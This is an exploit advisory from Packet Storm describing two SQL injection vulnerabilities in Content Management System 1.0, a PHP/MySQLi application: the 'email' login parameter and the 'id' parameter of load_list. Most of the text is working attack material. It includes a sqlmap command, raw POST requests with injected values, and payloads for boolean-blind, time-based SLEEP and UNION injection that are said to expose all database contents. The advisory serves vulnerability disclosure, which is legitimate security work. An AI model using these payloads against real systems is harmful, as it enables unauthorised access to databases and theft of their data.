Content Management System 1.0 SQL Injection

2020-12-17T00:00:00
ID PACKETSTORM:160588
Type packetstorm
Reporter Zhayi
Modified 2020-12-17T00:00:00

Description

                                        
                                            `# Exploit Title: Content Management System 1.0 - 'email' SQL Injection  
# Exploit Author: Zhayi (Zeo)  
# Date: 2020-12-14  
# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code  
# Affected Version: Version 1  
# Category: Web Application  
# Tested on: WINDOWS 10  
  
Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login"  
page in burpsute  
Step 2. Save POST the packet  
Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r  
request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast  
--dbs "  
Step 4. This will inject successfully and you will have an information  
disclosure of all databases contents  
  
POST the packet  
---  
POST /ajax.php?action=login HTTP/1.1  
Host: 10.211.55.4  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101  
Firefox/78.0  
Content-Length: 61  
Accept: */*  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3  
Origin: http://10.211.55.4  
Referer: http://10.211.55.4/login.php  
X-Requested-With: XMLHttpRequest  
Accept-Encoding: gzip  
  
email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123  
---  
  
SQLMAP  
---  
Parameter: email (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: email=admin@admin.com'and'p'='p' AND 9108=9108 AND  
'WlxU'='WlxU&password=admin123  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: email=admin@admin.com'and'p'='p' AND (SELECT 3864 FROM  
(SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123  
---  
  
-----------  
# Exploit Title: Content Management System 1.0 - 'id' SQL Injection  
# Exploit Author: Zhayi (Zeo)  
# Date: 2020-12-14  
# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code  
# Affected Version: Version 1  
# Category: Web Application  
# Tested on: WINDOWS 10  
  
Step 1. Capture the request of the "  
http://127.0.0.1/ajax.php?action=load_list" page in burpsute  
Step 2. Save POST the packet  
Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r  
request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast  
--dbs "  
Step 4. This will inject successfully and you will have an information  
disclosure of all databases contents  
  
POST the packet  
---  
POST /ajax.php?action=load_list HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101  
Firefox/78.0  
Content-Length: 63  
Accept: */*  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3  
Origin: http://127.0.0.1  
Referer:  
http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3  
X-Requested-With: XMLHttpRequest  
Accept-Encoding: gzip  
  
id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0  
---  
  
SQLMAP  
---  
Parameter: id (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689  
AND 'ZPQO'='ZPQO&start=0  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT  
6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 10 columns  
Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL  
SELECT  
NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL--  
-&start=0  
---  
  
  
`